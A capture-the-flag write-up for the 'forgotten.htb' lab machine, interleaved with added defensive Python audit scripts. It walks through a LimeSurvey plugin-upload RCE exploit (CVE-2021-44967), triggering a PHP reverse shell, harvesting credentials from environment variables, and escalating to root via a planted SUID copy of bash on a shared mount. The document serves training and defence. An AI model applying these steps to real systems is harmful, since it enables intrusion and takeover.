- SSH (22/tcp): OpenSSH 8.9p1 on an Ubuntu host. Host keys were returned (ECDSA and ED25519). SSH is available, which is useful for later lateral access if credentials or private keys are obtained.
- HTTP (80/tcp): Apache 2.4.56 (Debian). The base URL returns 403 Forbidden, so the web server is running but directory/index access is restricted. Service Info shows the host IP 172.17.0.2, which looks like an internal/container address (the SSH banner says Ubuntu while Apache reports Debian, which also points at a container); check for virtual hosts or Host header-based routing.
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 28:c7:f1:96:f9:53:64:11:f8:70:55:68:0b:e5:3c:22 (ECDSA)
|_ 256 02:43:d2:ba:4e:87:de:77:72:ce:5a:fa:86:5c:0d:f4 (ED25519)
80/tcp open http Apache httpd 2.4.56
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Directory Brute Forcing
/survey (Status: 301) [Size: 315] [--> http://forgotten.htb/survey/]
/server-status (Status: 403) [Size: 278]
Web page

- Start Installation

- The target has no database for the installer to use, so we create one ourselves and point the installer at it.
- Create the DB with the same details given to the installer:
MariaDB [(none)]> CREATE DATABASE limedb;
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]> CREATE USER 'john'@'%' IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.011 sec)
MariaDB [(none)]> GRANT SELECT, CREATE, INSERT, UPDATE, DELETE, ALTER, DROP, INDEX ON limedb.* TO 'john'@'%';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]>
- Now set bind-address to 0.0.0.0 in /etc/mysql/mariadb.conf.d/50-server.cnf so the installer can reach the DB over the network (this makes MariaDB listen on every interface, not just localhost).

- Check that the port (3306/tcp, the MariaDB default) is listening.
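As an added check that is not part of the original writeup: a small Python audit that reads the bind-address from a MariaDB server config and cross-checks it against `ss -ltn` output, so you can tell whether 3306 is reachable beyond localhost. The config text and the `ss` output below are constructed samples, not captured from the box.

```python
import re

# Constructed sample of a 50-server.cnf [mysqld] section (not the file from the writeup).
SAMPLE_CNF = """\
[server]

[mysqld]
user         = mysql
port         = 3306
datadir      = /var/lib/mysql
# bind-address = 127.0.0.1
bind-address = 0.0.0.0
"""

# Constructed sample of `ss -ltn` output.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       80      0.0.0.0:3306         0.0.0.0:*
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
SERVER_SECTIONS = {"mysqld", "server", "mariadb"}


def mysqld_bind_address(cnf_text):
    """Return the effective bind-address from the server sections, or None if unset.
    Later occurrences override earlier ones, matching how mysqld reads its config."""
    section, bind = None, None
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and whitespace
        if not line:
            continue
        header = re.match(r"\[(.+)\]$", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section in SERVER_SECTIONS and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key.replace("_", "-").lower() == "bind-address":
                bind = value
    return bind


def is_exposed(bind):
    """True when the configured address accepts connections from other hosts.
    An unset value is treated as exposed, since the server's own default is to
    listen on all addresses rather than on loopback."""
    if bind is None:
        return True
    return any(addr.strip() not in LOOPBACK for addr in bind.split(","))


def listening_addresses(ss_text, port):
    """Parse `ss -ltn` output and return the local addresses listening on `port`."""
    found = []
    for line in ss_text.splitlines()[1:]:       # skip the header row
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        addr, _, p = parts[3].rpartition(":")
        if p == str(port):
            found.append(addr.strip("[]"))
    return found


def audit(cnf_text, ss_text, port=3306):
    """Combine the config view and the socket view into one verdict."""
    bind = mysqld_bind_address(cnf_text)
    listeners = listening_addresses(ss_text, port)
    return {
        "bind_address": bind,
        "config_exposed": is_exposed(bind),
        "listening_on": listeners,
        "socket_exposed": any(a not in LOOPBACK for a in listeners),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_CNF, SAMPLE_SS).items():
        print(f"{key}: {value}")
```

The two views are kept separate on purpose: the config tells you what will happen after the next restart, the socket list tells you what is exposed right now, and the two disagree whenever someone edited the file without restarting the service.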


Initial Foothold
RCE
- Find an exploit for LimeSurvey Community Edition version 6.3.7+231127: there is one for CVE-2021-44967 (RCE through the plugin upload feature).
git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
- Edit config.xml and add the line <version>6.0</version> under <compatibility>:
<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>Y1LD1R1M</name>
        <type>plugin</type>
        <creationDate>2020-03-20</creationDate>
        <lastUpdate>2020-03-31</lastUpdate>
        <author>Y1LD1R1M</author>
        <authorUrl>https://github.com/Y1LD1R1M-1337</authorUrl>
        <supportUrl>https://github.com/Y1LD1R1M-1337</supportUrl>
        <version>5.0</version>
        <license>GNU General Public License version 2 or later</license>
        <description>
        <![CDATA[Author : Y1LD1R1M]]></description>
    </metadata>
    <compatibility>
        <version>3.0</version>
        <version>4.0</version>
        <version>5.0</version>
        <version>6.0</version>
    </compatibility>
    <updaters disabled="disabled"></updaters>
</config>
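The exploit works because the plugin manager accepts an archive whose config.xml merely claims compatibility with the installed version, so a defender reviewing uploaded plugins wants to see what such an archive declares before it is installed. The following Python is an added example, not code from the writeup or from LimeSurvey: it builds an in-memory ZIP containing the config.xml above and a placeholder PHP file, then reports the declared metadata, the compatibility versions, and every PHP entry that is not the plugin's expected main class file (LimeSurvey plugins are normally entered through <name>.php; treating any other PHP file as suspicious is a heuristic, not a LimeSurvey rule).

```python
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

# The config.xml shown above, reproduced here as a test fixture.
CONFIG_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<config>
<metadata>
<name>Y1LD1R1M</name>
<type>plugin</type>
<creationDate>2020-03-20</creationDate>
<lastUpdate>2020-03-31</lastUpdate>
<author>Y1LD1R1M</author>
<authorUrl>https://github.com/Y1LD1R1M-1337</authorUrl>
<supportUrl>https://github.com/Y1LD1R1M-1337</supportUrl>
<version>5.0</version>
<license>GNU General Public License version 2 or later</license>
<description>
<![CDATA[Author : Y1LD1R1M]]></description>
</metadata>
<compatibility>
<version>3.0</version>
<version>4.0</version>
<version>5.0</version>
<version>6.0</version>
</compatibility>
<updaters disabled="disabled"></updaters>
</config>
"""

# Constructed placeholder standing in for php-rev.php; it carries no payload.
PLACEHOLDER_PHP = b"<?php echo 'placeholder'; ?>\n"


def build_sample_plugin_zip():
    """Assemble the two-file archive the writeup describes, entirely in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("config.xml", CONFIG_XML)
        zf.writestr("php-rev.php", PLACEHOLDER_PHP)
    return buf.getvalue()


def audit_plugin_zip(data, installed_version):
    """Inspect a plugin archive without installing it and return what it declares."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        cfg = next((n for n in names if posixpath.basename(n) == "config.xml"), None)
        if cfg is None:
            return {"ok": False, "reason": "archive has no config.xml"}
        root = ET.fromstring(zf.read(cfg))

    name = (root.findtext("metadata/name") or "").strip()
    compat = [v.text.strip() for v in root.findall("compatibility/version") if v.text]
    php_files = [n for n in names if n.lower().endswith(".php")]
    # Heuristic: the plugin's own entry point is <name>.php; anything else deserves a look.
    unexpected_php = [n for n in php_files if posixpath.basename(n) != f"{name}.php"]
    major = installed_version.split(".")[0]
    declares_compat = any(v.split(".")[0] == major for v in compat)

    return {
        "ok": True,
        "name": name,
        "type": (root.findtext("metadata/type") or "").strip(),
        "plugin_version": (root.findtext("metadata/version") or "").strip(),
        "compat": compat,
        "declares_compat_with_installed": declares_compat,
        "php_files": php_files,
        "unexpected_php": unexpected_php,
        "has_main_class_file": f"{name}.php" in {posixpath.basename(n) for n in php_files},
    }


if __name__ == "__main__":
    report = audit_plugin_zip(build_sample_plugin_zip(), installed_version="6.3.7")
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against the archive from the writeup, the report shows a plugin that claims 6.x compatibility, ships no Y1LD1R1M.php at all, and contains one PHP file that is not an entry point: exactly the shape a plugin-install review should stop on.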
- In php-rev.php, change the IP and port.
- Now zip the two files, i.e. the config file and the PHP file.

- Upload and install the ZIP file in plugin.
- Trigger the RCE by requesting
http://forgotten.htb/survey/upload/plugins/Y1LD1R1M/php-rev.php
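The request that triggers the payload is a direct GET to a PHP file under upload/plugins/, a path that should only ever serve plugin assets. As an added detection example that is not from the writeup, the Python below scans Apache combined-format access log lines for any request to a .php file below upload/plugins/ and summarises them per client and script. The log lines are constructed to mirror the URL above, not copied from a real log.

```python
import re

# Apache combined/common log format: client, identity, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# A request whose path reaches a .php file anywhere below an upload/plugins/ directory.
PLUGIN_PHP_RE = re.compile(r"/upload/plugins/[^?\s]*\.php(?:\?|$)", re.IGNORECASE)

# Constructed sample log lines modelled on the writeup's URL; not a captured log.
SAMPLE_LOG = """\
10.0.0.9 - - [12/Jan/2024:10:01:02 +0000] "GET /survey/index.php/admin/authentication/sa/login HTTP/1.1" 200 5123
10.0.0.9 - - [12/Jan/2024:10:02:10 +0000] "GET /survey/upload/themes/survey/fruity/css/theme.css HTTP/1.1" 200 8810
10.0.0.9 - - [12/Jan/2024:10:03:30 +0000] "GET /survey/upload/plugins/Y1LD1R1M/config.xml HTTP/1.1" 200 611
10.0.0.9 - - [12/Jan/2024:10:03:44 +0000] "GET /survey/upload/plugins/Y1LD1R1M/php-rev.php HTTP/1.1" 200 0
10.0.0.9 - - [12/Jan/2024:10:03:45 +0000] "GET /survey/upload/plugins/Y1LD1R1M/php-rev.php?x=1 HTTP/1.1" 500 0
this line is not in log format
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_plugin_php_hits(lines):
    """Return the parsed entries whose request path executes PHP under upload/plugins/."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and PLUGIN_PHP_RE.search(entry["path"]):
            hits.append(entry)
    return hits


def summarize(hits):
    """Group hits by (client, script) so repeated triggers collapse to one row."""
    counts = {}
    for h in hits:
        script = h["path"].split("?", 1)[0]   # drop the query string
        key = (h["ip"], script)
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for (ip, script), n in summarize(find_plugin_php_hits(SAMPLE_LOG.splitlines())).items():
        print(f"{ip} requested {script} {n} time(s)")
```

The detection only fires on executed scripts, not on the config.xml fetch, because the upload directory legitimately serves static files. The matching hardening is to stop PHP from running there at all, for example a <FilesMatch "\.php$"> block with Require all denied scoped to the upload directory in the Apache config.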

- The env command lists all current environment variables, including any passwords stored in them.
HOSTNAME=efaa6f5097ed
PHP_VERSION=8.0.30
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=1729F83938DA44E27BA0F4D3DBDB397470D12172 BFDDD28642824F8118EF77909B67A5C12229118F 2C16C765DBE54A088130F1BC4B9B5F600B55F3B4 39B641343D8C104B2B146DC3F9C39DC0B9698544
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/home/limesvc
APACHE_LOG_DIR=/var/log/apache2
LANG=C
LS_COLORS=
PHP_SHA256=216ab305737a5d392107112d618a755dc5df42058226f1670e9db90e77d777d9
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
LIMESURVEY_PASS=5W5HN4K4GCXf9E
PHP_URL=https://www.php.net/distributions/php-8.0.30.tar.xz
LIMESURVEY_ADMIN=limesvc
APACHE_RUN_GROUP=limesvc
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=1
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
APACHE_RUN_DIR=/var/run/apache2
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=limesvc
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PHP_ASC_URL=https://www.php.net/distributions/php-8.0.30.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
OLDPWD=/home
_=/usr/bin/env
- Got the username and password from LIMESURVEY_ADMIN and LIMESURVEY_PASS: limesvc / 5W5HN4K4GCXf9E
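A password handed to the service as an environment variable (LIMESURVEY_PASS above) is readable by any code running as that user, which is what made the credential available to the web shell. The Python below is an added example, not code from the writeup: it parses an env dump, flags variables whose names look credential-like, and leaves *_FILE variables alone, since pointing the application at a file (the Docker secrets pattern) is the usual mitigation. The env text is constructed with placeholder values.

```python
import re

# Constructed env dump with placeholder values (shaped like the one in the writeup).
SAMPLE_ENV = """\
HOSTNAME=0123456789ab
PHP_VERSION=8.0.30
PWD=/home/limesvc
LS_COLORS=
LIMESURVEY_ADMIN=limesvc
LIMESURVEY_PASS=placeholder-not-a-real-secret
APACHE_RUN_USER=limesvc
DB_PASSWORD_FILE=/run/secrets/db_password
API_TOKEN=placeholder-token
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env
"""

# Name fragments that usually mean "the value is a secret".
SECRET_NAME_RE = re.compile(
    r"(PASS(WORD|WD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY|CREDENTIAL)", re.IGNORECASE
)


def parse_env(text):
    """Turn `env` output into a dict; values may contain '=' so split only once."""
    env = {}
    for line in text.splitlines():
        if "=" not in line:
            continue   # continuation of a multi-line value; ignored in this example
        name, value = line.split("=", 1)
        env[name] = value
    return env


def find_secret_vars(env):
    """Names that look like inline secrets. *_FILE variables hold a path, not the secret."""
    return sorted(
        name for name, value in env.items()
        if SECRET_NAME_RE.search(name) and value and not name.upper().endswith("_FILE")
    )


def redact(env, names):
    """Copy of env with the flagged values masked, safe to paste into a ticket."""
    return {k: ("<redacted>" if k in names else v) for k, v in env.items()}


if __name__ == "__main__":
    env = parse_env(SAMPLE_ENV)
    flagged = find_secret_vars(env)
    print("inline secrets:", flagged)
    for k, v in redact(env, flagged).items():
        print(f"{k}={v}")
```

Run inside a container as a health check, the flagged list is what an attacker with code execution would also see, which is the argument for moving those values into mounted secret files.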
Local Enumeration

- Connecting over SSH with these credentials gives access to user.txt:
9636d19ccb4cba6f41314e70dc62a959
Privilege Escalation
- Tried various escalation methods, but none worked.
- Now there are two shells: one from the RCE and the other from SSH.
- Switch to root in the remote (RCE) shell.
- Now copy /bin/bash to /var/www/html/survey/user.
- Change the permissions: chmod 6777 user

- Now in the SSH session (i.e. the container) go to /opt/limesurvey.
- Execute ./user

- Now read the flag with cat /root/root.txt:
0098e59b27c988da6ee263d58c5dae99
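The escalation works because one directory is visible in both shells (/var/www/html/survey in one, /opt/limesurvey in the other), so a SUID binary created by root on one side keeps its bits on the other. As an added example that is not from the writeup, the Python below walks a directory tree, lists regular files with the SUID or SGID bit set, and rates world-writable ones (such as the 6777 copy above) as critical; the demo builds a throw-away tree containing a placeholder script rather than a real copy of bash.

```python
import os
import stat
import tempfile


def find_setuid_files(root):
    """Return (relative path, permission bits, uid) for regular files below `root`
    that carry the SUID or SGID bit. Symlinks are not followed."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((os.path.relpath(path, root), stat.S_IMODE(st.st_mode), st.st_uid))
    return sorted(hits)


def severity(mode):
    """critical: SUID/SGID file that is also world-writable (anyone can swap its
    contents); high: any other SUID/SGID file inside a web root or shared mount."""
    if mode & stat.S_IWOTH:
        return "critical"
    return "high"


def build_demo_tree(base):
    """Constructed fixture: a fake shared mount with one ordinary file and one
    planted SUID 'user' file, mirroring the layout from the writeup."""
    os.makedirs(os.path.join(base, "application"), exist_ok=True)
    ordinary = os.path.join(base, "application", "index.php")
    with open(ordinary, "w") as f:
        f.write("<?php // placeholder\n")
    os.chmod(ordinary, 0o644)
    planted = os.path.join(base, "user")
    with open(planted, "w") as f:
        f.write("#!/bin/sh\n# placeholder, not a copy of bash\n")
    os.chmod(planted, 0o6777)   # same bits as the writeup; an owner may set SUID on their own file
    return base


def scan_demo():
    """Build the fixture in a temp dir, scan it, and return [(path, severity)]."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return [(path, severity(mode)) for path, mode, _uid in find_setuid_files(tmp)]


if __name__ == "__main__":
    for path, sev in scan_demo():
        print(f"{sev}: {path}")
    # On a real host, scan the shared path directly: find_setuid_files("/opt/limesurvey")
```

Scheduling this over every host directory that is bind-mounted into a container, together with mounting such paths nosuid where the application allows it, closes the gap the writeup uses: nosuid makes the kernel ignore the bits on execution, and the scan catches the file if someone still plants it.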